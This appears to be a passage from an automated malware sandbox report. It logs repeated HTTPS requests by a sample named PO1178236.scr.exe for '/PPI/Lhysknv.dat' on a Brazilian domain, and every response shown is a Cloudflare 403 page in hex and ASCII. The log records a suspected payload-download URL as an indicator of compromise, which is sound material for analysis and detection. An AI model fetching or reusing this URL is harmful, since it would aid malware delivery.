        2025-01-09 07:36:01 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:01 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 66 65 33 38 31 62 30 66 39 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0fe381b0f9f</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:01 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 66 65 33 38 31 62 30 66 39 66 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0fe381b0f9f',t:'MTczNjQwODE2MC4wMDAwMDA='};v
        2025-01-09 07:36:01 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.2.949716188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:01 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:01 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:01 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:16 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDqLVECS43crxJltnYqA%2B7dFZejAKCetqAaqGAPI%2FnJguI%2FYZmyvv%2FhSYmQLSzJQ6lSVEDBsNy3Q3HCZsM9mFzEKkhOKMqfEuXgr8iB2fVi1HMMVlE55xBj1e3m%2B0iLZPC29Z8kHpclUjlrq"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1021a2443fe-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1753753&cwnd=236&unsent_bytes=0&cid=95e4ca477d63850e&ts=150&x=0"
        2025-01-09 07:36:01 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:01 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:01 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:01 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 30 32 31 61 32 34 34 33 66 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1021a2443fe</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:01 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 30 32 31 61 32 34 34 33 66 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1021a2443fe',t:'MTczNjQwODE2MS4wMDAwMDA='};v
        2025-01-09 07:36:01 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.2.949717188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:02 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:02 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:02 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:17 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxExzAR7w3rUFap0GylIo2jfIt8mFZeaNocEb%2FCLcTnHns0D42XJp0hzn%2BeMKkaLPfEIXDSuyTvYLugFiqKSdovexg2jwqRDK9CK4PVbjBGUEzHyltPhPAZr7rNKLBJ%2FNrMdo2kYrSJRJMiP"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1060ebe6a5b-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1699&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1718658&cwnd=209&unsent_bytes=0&cid=851b9595ba60d9bb&ts=148&x=0"
        2025-01-09 07:36:02 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:02 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:02 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:02 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 30 36 30 65 62 65 36 61 35 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1060ebe6a5b</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:02 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 30 36 30 65 62 65 36 61 35 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1060ebe6a5b',t:'MTczNjQwODE2Mi4wMDAwMDA='};var a
        2025-01-09 07:36:02 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        11192.168.2.949718188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:02 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:03 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:02 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:17 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62m9lEfrPBdYTGmx46QeKIs8hCGIzNNFKIZbLtACCIABL4JpkECcU3wDW1kHW3%2Fxlw6JiHtCYWZZDaagf5Gad2PnY%2BrDhniq6AUQ%2F9Rp9xhquHvuuEgDA3Me63dDKdoyGg050x4VOi3TXOQ6"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c109f9171a3c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2006&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1427872&cwnd=229&unsent_bytes=0&cid=2f0f6ade932bd27a&ts=133&x=0"
        2025-01-09 07:36:03 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:03 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:03 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:03 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 30 39 66 39 31 37 31 61 33 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 